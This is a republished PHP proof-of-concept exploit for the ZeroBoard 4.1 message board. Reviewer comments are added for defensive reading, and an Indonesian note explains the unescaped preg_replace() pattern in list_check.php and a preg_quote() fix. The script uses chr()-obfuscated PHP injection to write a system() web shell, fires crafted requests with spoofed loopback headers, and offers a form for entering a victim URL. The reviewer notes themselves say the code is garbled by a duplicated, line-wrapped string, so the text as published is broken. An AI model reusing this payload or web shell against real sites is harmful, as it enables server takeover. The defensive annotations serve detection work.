[PHP] POC + Exploit Zeroboard 4.1
author : fix
source : http://75n1.blogspot.co.id/2015/09/cookie-stealing-over-sql-injection.html

<?php
/**
* @author Jei.Friee
* @copyright 2012
*
* ZeroBoard 4.1 Exploit
*/
// Proof-of-concept as published. NOTE(review): this file does not parse as-is.
// The lines right after the `$str = '...';` assignment repeat the tail of that
// string literal outside the quotes (apparently a copy-paste artifact), the
// comment-open marker in that stray fragment starts a block comment that is never
// closed, and the literal itself is line-wrapped mid-token (`c` / `hr(100)`),
// which looks like wrapping by the publishing site. Read this page as a record of
// the technique and of its indicators, not as runnable code.
//
// Defensive reading (what to look for and why it works):
// - Request indicator: a request to <board>/lib.php whose query string starts with
//   `REMOTE_ADDR=` followed by a block-comment close, PHP source, and a block-comment
//   open, plus `HTTP_SESSION_VARS[zb_last_connect_check]`, `HTTP_SERVER_VARS` and
//   `HTTP_ENV_VARS` parameters; followed by a fetch of <board>/data/now_connect.php
//   from the same client. Those parameter names suggest the technique depends on
//   register_globals-style variable injection (off by default since PHP 4.2,
//   removed in 5.4) — TODO confirm against the ZeroBoard 4.1 source.
// - Host indicator: the chr() chain is only obfuscation; it spells a relative file
//   name (./anaski.php) and a one-line PHP body that passes a variable to system().
//   That file name, written next to whichever script includes the injected code,
//   is the on-disk artifact to search for.
// - Mitigation is described in the advisory text below this script (preg_quote() on
//   the request-controlled keyword in include/list_check.php) and at the linked
//   upstream advisory.
error_reporting(0); // with the @-prefixed calls below, every failure in this script is silent
// Query string for lib.php: closes a PHP block comment, injects a fputs(fopen(...))
// call, and reopens a comment — presumably so that, when the request data is written
// into a generated PHP file that is later included, the injected call runs.
$str = 'REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47)
.chr(97).chr(110).chr(97).chr(115).chr(107).chr(105).chr(46).chr(112).chr
(104).chr(112),chr(119).chr(43)),chr(60).
chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).
chr(36).chr(99).chr(109).c
hr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&
HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=
1&HTTP_ENV_VARS=1';
// NOTE(review): from here to the next `';` is a stray duplicate of the literal
// above, outside any string — not valid PHP; left exactly as published.
.chr(97).chr(110).chr(97).chr(115).chr(107).chr(105).chr(46).chr(112).chr
(104).chr(112),chr(119).chr(43)),chr(60).
chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).
chr(36).chr(99).chr(109).c
hr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&
HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=
1&HTTP_ENV_VARS=1';
// $uri_victim already carries '?'.$str; the file_get_contents() call below appends
// '?'.$str a second time, so the request seen in logs has two '?' characters.
$uri_victim = $_GET['victim'].'/lib.php?'.$str;
// data/now_connect.php is the file whose inclusion would run the injected code if
// the write succeeded — the second request a detection rule should pair with the first.
$uri_playload = $_GET['victim'].'/data/now_connect.php';
// NOTE(review): the URL echoed to the user does not correspond to the file name the
// payload actually writes (see header); responders should not rely on this path alone.
$uri_shell = $_GET['victim'].'/data/shell.php';
if(isset($_GET['victim'])) {
@file_get_contents($uri_victim.'?'.$str);
@file_get_contents($_GET['victim'].'/data/now_connect.php');
echo "".$uri_shell."";
$host = @parse_url($_GET['victim'],PHP_URL_HOST);
//echo $host;
// Raw HTTP over a hand-rolled socket to port 80 (20 s timeout): a POST with an
// empty body ($msg is null, so Content-Length is 0) followed by a pipelined GET to
// the same URI. $cookie is never assigned in this file, so the Cookie header is empty.
$fp = @fsockopen($host,'80',$errno,$errstr,20);
if($fp) {
$msg = null;
fputs($fp,"POST $uri_victim HTTP/1.1\r\n");
fputs($fp,"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");
fputs($fp,"Referer: $uri_victim\r\n");
fputs($fp,"Accept-Language: zh-cn\r\n");
fputs($fp,"Content-Type: application/x-www-form-urlencoded\r\n");
fputs($fp,"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)\r\n");
// Spoofed loopback CLIENT-IP / X-FORWARDED-FOR headers. They only matter if the
// target trusts these headers for its address check; for defenders they are a
// cheap log-search indicator (external client, loopback forwarded-for).
fputs($fp,"CLIENT-IP: 127.0.0.1\r\n");
fputs($fp,"X-FORWARDED-FOR: 127.0.0.1\r\n");
fputs($fp,"Host: $host\r\n");
fputs($fp,"Content-Length: ".strlen($msg)."\r\n");
fputs($fp,"Connection: Keep-Alive\r\n");
fputs($fp,"Cache-Control: no-cache\r\n");
fputs($fp,"Cookie: $cookie\r\n");
fputs($fp,"\r\n");
fputs($fp,$msg."\r\n");
// Second request on the same keep-alive connection; the distinctive User-Agent
// below is another string worth matching on in access logs.
fputs($fp,"GET $uri_victim HTTP/1.1\r\n");
fputs($fp,"Host: $host\r\n");
fputs($fp,"Accept: */*\r\n");
fputs($fp,"Referer: $uri_victim\r\n");
fputs($fp,"User-Agent: Lamerz\r\n");
fputs($fp,"CLIENT-IP: 127.0.0.1\r\n");
fputs($fp,"X-FORWARDED-FOR: 127.0.0.1\r\n");
fputs($fp,"Pragma: no-cache\r\n");
fputs($fp,"Cache-Control: no-cache\r\n");
fputs($fp,"Connection: Close\r\n\r\n");
}
// Response is collected in 1 KiB chunks for display; $res stays unset when the
// socket could not be opened (the warning that would follow is hidden by
// error_reporting(0)).
while($fp && !feof($fp)) {
$res[] = fread($fp,1024);
}
}
?>
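<!-- Target URL comes only from the user; no default is pre-filled. The published
     page pre-filled a third-party site here, which has been removed. -->
<form method="get" action="" >
<input type="text" name="victim" size="25" value="" />
<input type="submit" value="Excute" name="exp" />
</form>
<pre>
<?php
// $res is populated only by the socket-read loop in the script above; guard so a
// request with no reachable host does not dereference an undefined variable.
if (isset($res)) {
    print_r($res);
}
?>
</pre>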
Kesalahannya terdapat pada preg_replace() di include/list_check.php baris 105/106:
// Quoted from include/list_check.php (lines 105/106, per the text above).
// $keyword is request-controlled and is interpolated into the PCRE pattern without
// preg_quote(), so a search term containing regex metacharacters or the '/'
// delimiter alters the pattern instead of being matched literally.
$keyword_pattern = "/([^<]*)$keyword([^>]*)/i" ;
// The same unescaped $keyword is also interpolated into the replacement string,
// where it lands inside HTML markup, and backslash or '$' sequences in it would be
// read by preg_replace() as backreferences. Quoting the pattern alone (the fix
// proposed below) does not cover this part unless $keyword is escaped earlier —
// NOTE(review): not visible here, confirm in list_check.php.
$memo = preg_replace ( $keyword_pattern , "\\1<font color=FF001E style=background-color:FFF000;>$keyword</font>\\2" , $memo );
Seperti terlihat di atas, beberapa sintaks seperti "<?php" tidak difilter.
Untuk memperbaikinya, bisa ditambahkan fungsi preg_quote():
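// Hardened form of the list_check.php pattern. As written on the original page the
// preg_quote() call sat inside the string literal (and its nested double quotes
// broke the literal), so it was never executed. Concatenating the escaped keyword
// into the pattern, with '/' given as the delimiter, makes regex metacharacters and
// the delimiter itself match literally. The replacement string on the following
// line still needs its own escaping (HTML context, and '\' / '$' backreference
// sequences) — preg_quote() only protects the pattern.
$keyword_pattern = "/([^<]*)" . preg_quote($keyword, "/") . "([^>]*)/i";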
Mungkin penjelasan saya kurang lengkap; untuk lebih jelasnya bisa dicek di web http://pandora.sapzil.info/text/notify/20050123.zb41advisory.php
./CMIIW